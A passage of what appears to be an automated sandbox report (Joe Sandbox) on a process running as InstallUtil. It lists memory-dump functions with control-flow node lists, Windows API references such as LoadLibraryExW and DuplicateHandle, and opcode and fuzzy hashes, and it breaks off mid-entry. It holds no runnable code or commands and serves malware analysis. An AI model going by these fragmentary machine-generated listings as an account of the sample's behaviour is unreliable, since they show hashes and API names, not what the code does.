                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33e113d688f858211fec02c4f07b48eab9987a54cbfbdc9b849dd0016be4a408
                                        • Instruction ID: 2c50cd2205a87eee01ae83b04764eec0deb0cd9e87509ec2f389d773d7bfef2d
                                        • Opcode Fuzzy Hash: 33e113d688f858211fec02c4f07b48eab9987a54cbfbdc9b849dd0016be4a408
                                        • Instruction Fuzzy Hash: DA526C34B006098FDB14DB68D584AADBBF2FF84314F248969E80ADB754DB35ED81CB91
                                        Function 05C73140 Relevance: .5, Instructions: 545COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d2e54348370cc04ef870b6b0671e23eea2f73c656707c935cae656d2da4a1e0
                                        • Instruction ID: 4881c49f63abd42450888c9450431f7cf374195317098e7d053b994db0ea589e
                                        • Opcode Fuzzy Hash: 6d2e54348370cc04ef870b6b0671e23eea2f73c656707c935cae656d2da4a1e0
                                        • Instruction Fuzzy Hash: 8B324030E10759CFCB14EB65C89059DB7B6FFC9700F50CAAAD449A7254EF30AA85DB90
                                        Function 05C03B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 05C03BAE
                                        • GetCurrentThread.KERNEL32 ref: 05C03BEB
                                        • GetCurrentProcess.KERNEL32 ref: 05C03C28
                                        • GetCurrentThreadId.KERNEL32 ref: 05C03C81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID: 0`
                                        • API String ID: 2063062207-1002706549
                                        • Opcode ID: 0b6fe1e4bba91ecd2f4482d50c2845577787bb547f6524d9d49b8e73428f4e17
                                        • Instruction ID: dcce392c9d0224d5669775dc8245b4fd9fcc1dafbadee423a24d5757b7cb4216
                                        • Opcode Fuzzy Hash: 0b6fe1e4bba91ecd2f4482d50c2845577787bb547f6524d9d49b8e73428f4e17
                                        • Instruction Fuzzy Hash: DA5156B09003498FEB14DFAAD548B9EBBF1FF88714F208859E409A7390DB749944CF65
                                        Function 05C03B30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 05C03BAE
                                        • GetCurrentThread.KERNEL32 ref: 05C03BEB
                                        • GetCurrentProcess.KERNEL32 ref: 05C03C28
                                        • GetCurrentThreadId.KERNEL32 ref: 05C03C81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID: 0`
                                        • API String ID: 2063062207-1002706549
                                        • Opcode ID: 46135b94d0fc8fec51a4fb92c91b010ff04dcd9da7c1ff439d7c7f7494e372b4
                                        • Instruction ID: 64af9e1c19a6a6ca532a884e348b323ba9dfac9ceb86983fdebee539e61173c8
                                        • Opcode Fuzzy Hash: 46135b94d0fc8fec51a4fb92c91b010ff04dcd9da7c1ff439d7c7f7494e372b4
                                        • Instruction Fuzzy Hash: 485156B09003498FEB14DFAAD548B9EBBF1FF88714F208819E409A7390DB749944CF65
                                        Function 05C0C031 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1183 5c0c031-5c0c04f 1184 5c0c051-5c0c05e call 5c0b504 1183->1184 1185 5c0c07b-5c0c07f 1183->1185 1191 5c0c060 1184->1191 1192 5c0c074 1184->1192 1187 5c0c081-5c0c08b 1185->1187 1188 5c0c093-5c0c0d4 1185->1188 1187->1188 1194 5c0c0e1-5c0c0ef 1188->1194 1195 5c0c0d6-5c0c0de 1188->1195 1239 5c0c066 call 5c0c2c8 1191->1239 1240 5c0c066 call 5c0c2d8 1191->1240 1192->1185 1196 5c0c0f1-5c0c0f6 1194->1196 1197 5c0c113-5c0c115 1194->1197 1195->1194 1199 5c0c101 1196->1199 1200 5c0c0f8-5c0c0ff call 5c0b510 1196->1200 1202 5c0c118-5c0c11f 1197->1202 1198 5c0c06c-5c0c06e 1198->1192 1201 5c0c1b0-5c0c270 1198->1201 1204 5c0c103-5c0c111 1199->1204 1200->1204 1234 5c0c272-5c0c275 1201->1234 1235 5c0c278-5c0c2a3 GetModuleHandleW 1201->1235 1205 5c0c121-5c0c129 1202->1205 1206 5c0c12c-5c0c133 1202->1206 1204->1202 1205->1206 1209 5c0c140-5c0c149 call 5c04620 1206->1209 1210 5c0c135-5c0c13d 1206->1210 1214 5c0c156-5c0c15b 1209->1214 1215 5c0c14b-5c0c153 1209->1215 1210->1209 1216 5c0c179-5c0c186 1214->1216 1217 5c0c15d-5c0c164 1214->1217 1215->1214 1224 5c0c188-5c0c1a6 1216->1224 1225 5c0c1a9-5c0c1af 1216->1225 1217->1216 1219 5c0c166-5c0c176 call 5c09f10 call 5c0b520 1217->1219 1219->1216 1224->1225 1234->1235 1236 5c0c2a5-5c0c2ab 1235->1236 1237 5c0c2ac-5c0c2c0 1235->1237 1236->1237 1239->1198 1240->1198
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C0C296
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: c3bc960d23f3e3128382e3353a8cabd424cffada7f6f0137ad7b49a36cc1881b
                                        • Instruction ID: 12a2e571c3f52ac8ea10c49915c58c0e2d24e4a6ee3c53eee408eae5f964e1ac
                                        • Opcode Fuzzy Hash: c3bc960d23f3e3128382e3353a8cabd424cffada7f6f0137ad7b49a36cc1881b
                                        • Instruction Fuzzy Hash: 21814570A00B058FD724DF6AD44575ABBF2FF88304F008A2DD48AD7A90DB75EA45CB90
                                        Function 0219EC79 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1241 219ec79-219ec93 1242 219ecbd-219ecd3 1241->1242 1243 219ec95-219ecbc 1241->1243 1263 219ecd5 call 219ec79 1242->1263 1264 219ecd5 call 219ed60 1242->1264 1246 219ecda-219ecdc 1247 219ecde-219ece1 1246->1247 1248 219ece2-219ed41 1246->1248 1255 219ed43-219ed46 1248->1255 1256 219ed47-219edd4 GlobalMemoryStatusEx 1248->1256 1259 219eddd-219ee05 1256->1259 1260 219edd6-219eddc 1256->1260 1260->1259 1263->1246 1264->1246
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015924635.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2190000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4948396d3e8406f7045431f11746cd97d0524a36bdeec060dfb8148ba1acb1b
                                        • Instruction ID: 0449420df59d252db9255ec496d5d3116145779ea975e6144302ce02587e2ce3
                                        • Opcode Fuzzy Hash: a4948396d3e8406f7045431f11746cd97d0524a36bdeec060dfb8148ba1acb1b
                                        • Instruction Fuzzy Hash: F7412572E003598FCB04CFA9D84439EBBF1AF89210F19856AD404EB381DB389885CBA0
                                        Function 05C0E205 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1265 5c0e205-5c0e20c 1266 5c0e20e-5c0e25e 1265->1266 1267 5c0e25f-5c0e276 1265->1267 1266->1267 1268 5c0e281-5c0e288 1267->1268 1269 5c0e278-5c0e27e 1267->1269 1270 5c0e293-5c0e2cb 1268->1270 1271 5c0e28a-5c0e290 1268->1271 1269->1268 1272 5c0e2d3-5c0e332 CreateWindowExW 1270->1272 1271->1270 1273 5c0e334-5c0e33a 1272->1273 1274 5c0e33b-5c0e373 1272->1274 1273->1274 1278 5c0e380 1274->1278 1279 5c0e375-5c0e378 1274->1279 1280 5c0e381 1278->1280 1279->1278 1280->1280
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C0E322
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 6e91d90cf00a9b626aceced9bcb74e043b2e9e76195432ee884c2b24c2ad2510
                                        • Instruction ID: e4f54378dd210352fde67f76e8393a172363af8f0b69e172ff7844a2114285e3
                                        • Opcode Fuzzy Hash: 6e91d90cf00a9b626aceced9bcb74e043b2e9e76195432ee884c2b24c2ad2510
                                        • Instruction Fuzzy Hash: C351E2B1D00309DFDB14CFAAC984ADDBFB5BF48310F20952AE819AB250D7719945CF90
                                        Function 05C0E210 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1281 5c0e210-5c0e276 1282 5c0e281-5c0e288 1281->1282 1283 5c0e278-5c0e27e 1281->1283 1284 5c0e293-5c0e332 CreateWindowExW 1282->1284 1285 5c0e28a-5c0e290 1282->1285 1283->1282 1287 5c0e334-5c0e33a 1284->1287 1288 5c0e33b-5c0e373 1284->1288 1285->1284 1287->1288 1292 5c0e380 1288->1292 1293 5c0e375-5c0e378 1288->1293 1294 5c0e381 1292->1294 1293->1292 1294->1294
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C0E322
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 5c5beb4913419810ab1d3d6dd321a0c6a54d78051b390cbf4d4a0c9bc31bf31c
                                        • Instruction ID: 8988335918e63bae5d6e1751ed84d2cabc30be536e5de75120b87dba5c1cc839
                                        • Opcode Fuzzy Hash: 5c5beb4913419810ab1d3d6dd321a0c6a54d78051b390cbf4d4a0c9bc31bf31c
                                        • Instruction Fuzzy Hash: 4A41C0B1D00309DFDB14CFAAC884ADEBFB5BF48310F24952AE819AB250D7719945CF90
                                        Function 05C75590 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1389 5c75590-5c755b4 1390 5c755b6-5c755b9 1389->1390 1391 5c755c7-5c755ca 1390->1391 1392 5c755bb-5c755c2 1390->1392 1393 5c75644-5c757d8 1391->1393 1394 5c755cc-5c755cf 1391->1394 1392->1391 1449 5c75911-5c75924 1393->1449 1450 5c757de-5c757e5 1393->1450 1395 5c755d1-5c755e2 1394->1395 1396 5c755ed-5c755f0 1394->1396 1405 5c7598b-5c75992 1395->1405 1406 5c755e8 1395->1406 1396->1393 1398 5c755f2-5c755f5 1396->1398 1400 5c755f7-5c75608 1398->1400 1401 5c75613-5c75616 1398->1401 1400->1405 1411 5c7560e 1400->1411 1402 5c7562e-5c75631 1401->1402 1403 5c75618-5c7562b 1401->1403 1408 5c75633-5c75638 1402->1408 1409 5c7563b-5c7563e 1402->1409 1407 5c75997-5c75999 1405->1407 1406->1396 1412 5c759a0-5c759a3 1407->1412 1413 5c7599b 1407->1413 1408->1409 1409->1393 1415 5c75927-5c7592a 1409->1415 1411->1401 1412->1390 1419 5c759a9-5c759b2 1412->1419 1413->1412 1417 5c7592c-5c7593d 1415->1417 1418 5c75948-5c7594b 1415->1418 1417->1395 1426 5c75943 1417->1426 1420 5c75965-5c75968 1418->1420 1421 5c7594d-5c7595e 1418->1421 1424 5c75986-5c75989 1420->1424 1425 5c7596a-5c7597b 1420->1425 1421->1405 1429 5c75960 1421->1429 1424->1405 1424->1407 1425->1403 1432 5c75981 1425->1432 1426->1418 1429->1420 1432->1424 1451 5c757eb-5c7580e 1450->1451 1452 5c75899-5c758a0 1450->1452 1461 5c75816-5c7581e 1451->1461 1452->1449 1454 5c758a2-5c758d5 1452->1454 1465 5c758d7 1454->1465 1466 5c758da-5c75907 1454->1466 1463 5c75823-5c75864 1461->1463 1464 5c75820 1461->1464 1474 5c75866-5c75877 1463->1474 1475 5c7587c-5c7588d 1463->1475 1464->1463 1465->1466 1466->1419 1474->1419 1475->1419
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: d42842660c35da734bb2ed690e1d08f937b926ad89f903a5979c9b8c90284899
                                        • Instruction ID: eca76d8291a0faef9043f2e4056a8a409ae165d3503f4b6584d5e3ade85a2415
                                        • Opcode Fuzzy Hash: d42842660c35da734bb2ed690e1d08f937b926ad89f903a5979c9b8c90284899
                                        • Instruction Fuzzy Hash: 85C16F35F002199FDF14DBA4C954AAEBBB6FF88320F244569D502AB354DB71ED42CB90
                                        Function 05C03D78 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1478 5c03d78-5c03e0c DuplicateHandle 1479 5c03e15-5c03e32 1478->1479 1480 5c03e0e-5c03e14 1478->1480 1480->1479
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C03DFF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: c13482ea9128dd24e5fd6235476f4d140fd1134075a133d18da0eb35e62ef4c9
                                        • Instruction ID: 1bce9cab5fc1ed5114fbc1f9da77adeb7edd586898cfde2d6068bcaadacffc1c
                                        • Opcode Fuzzy Hash: c13482ea9128dd24e5fd6235476f4d140fd1134075a133d18da0eb35e62ef4c9
                                        • Instruction Fuzzy Hash: 8921E4B59002499FDB10CFAAD884ADEBBF9FB48710F14841AE914A3350D379A950CFA4
                                        Function 05C03D70 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1483 5c03d70-5c03e0c DuplicateHandle 1484 5c03e15-5c03e32 1483->1484 1485 5c03e0e-5c03e14 1483->1485 1485->1484
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C03DFF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 0b6b9de126c81573daf2b1476e989cf34f3294338cc7be7a08bfe4cf9079773c
                                        • Instruction ID: 63193d40201c26492d763d5bdaf65029ddf12f598a089b65f197fce345e60ea2
                                        • Opcode Fuzzy Hash: 0b6b9de126c81573daf2b1476e989cf34f3294338cc7be7a08bfe4cf9079773c
                                        • Instruction Fuzzy Hash: 51211FB5D003489FDB10CFAAD984ADEBBF4FB48714F14842AE919A3350D378A950CFA4
                                        Function 05C0C490 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1496 5c0c490-5c0c4d8 1498 5c0c4e0-5c0c50f LoadLibraryExW 1496->1498 1499 5c0c4da-5c0c4dd 1496->1499 1500 5c0c511-5c0c517 1498->1500 1501 5c0c518-5c0c535 1498->1501 1499->1498 1500->1501
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05C0C311,00000800,00000000,00000000), ref: 05C0C502
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 02b2e8022cdffc85ca4f38d75c365f0808b9da2ab603023f073caee3b9f5d9b8
                                        • Instruction ID: 3e44f1cb2014335030a7ce1bac646242d868012755e5b8ce436256759e0d9740
                                        • Opcode Fuzzy Hash: 02b2e8022cdffc85ca4f38d75c365f0808b9da2ab603023f073caee3b9f5d9b8
                                        • Instruction Fuzzy Hash: F31117B69003099FDB10CFAAC444ADEFBF5FB48710F14851ED515A7240C379A545CFA4
                                        Function 05C0B548 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1488 5c0b548-5c0c4d8 1490 5c0c4e0-5c0c50f LoadLibraryExW 1488->1490 1491 5c0c4da-5c0c4dd 1488->1491 1492 5c0c511-5c0c517 1490->1492 1493 5c0c518-5c0c535 1490->1493 1491->1490 1492->1493
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05C0C311,00000800,00000000,00000000), ref: 05C0C502
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 8f2e23716fdb1f26c9992aa42c8fccb8477438c813f9f758b866be08a4e82142
                                        • Instruction ID: 05bc1e54add51d729debd007f23a53fc21edd2cb84644ca3d5be055ebc104221
                                        • Opcode Fuzzy Hash: 8f2e23716fdb1f26c9992aa42c8fccb8477438c813f9f758b866be08a4e82142
                                        • Instruction Fuzzy Hash: 781114B69043499FDB20DF9AC444AAEFBF5FB88710F10852ED519A7240C375A945CFA4
                                        Function 0219ED60 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1504 219ed60-219edd4 GlobalMemoryStatusEx 1506 219eddd-219ee05 1504->1506 1507 219edd6-219eddc 1504->1507 1507->1506
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0219EDC7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2015924635.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_2190000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 5a39b3b2d65f7dfe87ed19769295abe15b55b4cf33289a206c52615dfa408c36
                                        • Instruction ID: 4e46ad2f847ab262b0a87d120b8485b8309f9e0acfc98433f8dc22c6c373eadc
                                        • Opcode Fuzzy Hash: 5a39b3b2d65f7dfe87ed19769295abe15b55b4cf33289a206c52615dfa408c36
                                        • Instruction Fuzzy Hash: 401123B1C0065A9FDB10DF9AC544BDEFBF4BF48620F10812AD818A7240D779A944CFA5
                                        Function 05C0C230 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C0C296
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027180919.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c00000_InstallUtil.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: d4e1a16ffcbb2c1f53a7bca22630994d63a13c9441f4ac26ec15fd876a4473c7
                                        • Instruction ID: 465ab64f76798c961b84ad99ca729695a02364b1e214d802cc1ebc9ff54accd8
                                        • Opcode Fuzzy Hash: d4e1a16ffcbb2c1f53a7bca22630994d63a13c9441f4ac26ec15fd876a4473c7
                                        • Instruction Fuzzy Hash: CF1110B5C003498FDB10DF9AC844BDEFBF4EB88220F10852AD419B7650C379A645CFA1
                                        Function 05C7D048 Relevance: .8, Instructions: 795COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab337480b48985398b3074ba270fba722a203be47ac18473bf6119e9a78d07ea
                                        • Instruction ID: cb3be55c5d48e707bf111f54326d97394005f9b53860671a521cdd6cec25935c
                                        • Opcode Fuzzy Hash: ab337480b48985398b3074ba270fba722a203be47ac18473bf6119e9a78d07ea
                                        • Instruction Fuzzy Hash: CA625530A0071ACFDB15EB68D980A5EB7B2FF84710F248A68D4069F759DB71ED46CB81
                                        Function 05C730E8 Relevance: .4, Instructions: 427COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e4f00bbc5caa7c9a5a058f752328bb5a57c673530bebf669bc6a466837c72fa
                                        • Instruction ID: dc7045b96692ce5b22ce9ad168835ae6720fbf053f1294543ccc12ba00134cfc
                                        • Opcode Fuzzy Hash: 8e4f00bbc5caa7c9a5a058f752328bb5a57c673530bebf669bc6a466837c72fa
                                        • Instruction Fuzzy Hash: 82024934A002488FDB24DB58C588A6DBBF2FF44715F58C8A9D45A9BB61DB35ED41CB80
                                        Function 05C7ADC0 Relevance: .4, Instructions: 395COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdaa9cbaf8e56c0a45b21684ef062401f2b925e602f20236b5732e61035835fd
                                        • Instruction ID: 3d3f566b0644c17a4a814f7a43e5b2d2a1cd3e0bbdddfc8cc279bc8aeba59e16
                                        • Opcode Fuzzy Hash: fdaa9cbaf8e56c0a45b21684ef062401f2b925e602f20236b5732e61035835fd
                                        • Instruction Fuzzy Hash: 04E18134A00309CFDF25DB69D890AAEB7B2FF85300F248929E415EB754EB719D42CB91
                                        Function 05C7B632 Relevance: .3, Instructions: 285COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c92ec4b375219f9032728fd9df9b1314b770f39c23461d049d12095b21492df
                                        • Instruction ID: 32be16a39585767f38944b9b488faeac4e68f8fc9ff5edee70155c0c466cdbf8
                                        • Opcode Fuzzy Hash: 1c92ec4b375219f9032728fd9df9b1314b770f39c23461d049d12095b21492df
                                        • Instruction Fuzzy Hash: 0EA16530B0020D8BEF24DA5CD890BBEB6A7FB89314F644826E509E7795EF34DD819761
                                        Function 05C7B87C Relevance: .3, Instructions: 259COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f97a5c14d20232315817085056f0cd453f0234aaebf788104d7fb2ab6a327272
                                        • Instruction ID: 5a5a3ef88be068063ae932fb69759b9b069941c0c161f10c2481e116d3cd9e98
                                        • Opcode Fuzzy Hash: f97a5c14d20232315817085056f0cd453f0234aaebf788104d7fb2ab6a327272
                                        • Instruction Fuzzy Hash: D1A12A30E0460D8FDB20DB68C480BAEB7B2FB45328F248966E455DB651E735EE81CB91
                                        Function 05C78160 Relevance: .2, Instructions: 248COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f52d73282e1a2b2de299100fd34150131b57175aa36746e7696cd561c07042f9
                                        • Instruction ID: cbb45792dc4eb186f0440f6647500538a2241457900f42cf39db684723ee704f
                                        • Opcode Fuzzy Hash: f52d73282e1a2b2de299100fd34150131b57175aa36746e7696cd561c07042f9
                                        • Instruction Fuzzy Hash: F391CF30B006098FDB14DB79C8946AEB7A7FFC4300F148929DA06DB794EB75ED428B90
                                        Function 05C79240 Relevance: .2, Instructions: 230COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56e2854d4ab81d1eaeddb7c8125531b12d5b3ac0aff4257e537b15f73b6fa1fb
                                        • Instruction ID: 8aa4a8fe268b19b43a99bb289eab4808aed2738d873f7c5799bf90ffae2c5221
                                        • Opcode Fuzzy Hash: 56e2854d4ab81d1eaeddb7c8125531b12d5b3ac0aff4257e537b15f73b6fa1fb
                                        • Instruction Fuzzy Hash: 78913F30B0021A8BDB54EF69D890BAE77F6FF88700F108965D909EB744EB719D419B91
                                        Function 05C75ED0 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31832fd403f5e9706fd4cac24ba2902a82b0d3d0f6046ad0d34d33a950b90e16
                                        • Instruction ID: 31e704142e59613994782cded811188de3b8c1610a2a9111483e4a3810fef1b4
                                        • Opcode Fuzzy Hash: 31832fd403f5e9706fd4cac24ba2902a82b0d3d0f6046ad0d34d33a950b90e16
                                        • Instruction Fuzzy Hash: 9B61E671F001218FDF109B7ED98496FBADBAFC4610B154439E80ADB360DEA5EE028BC5
                                        Function 05C73F79 Relevance: .2, Instructions: 223COMMON
                                        Download Yara Rule
                                        Memory Dump Source
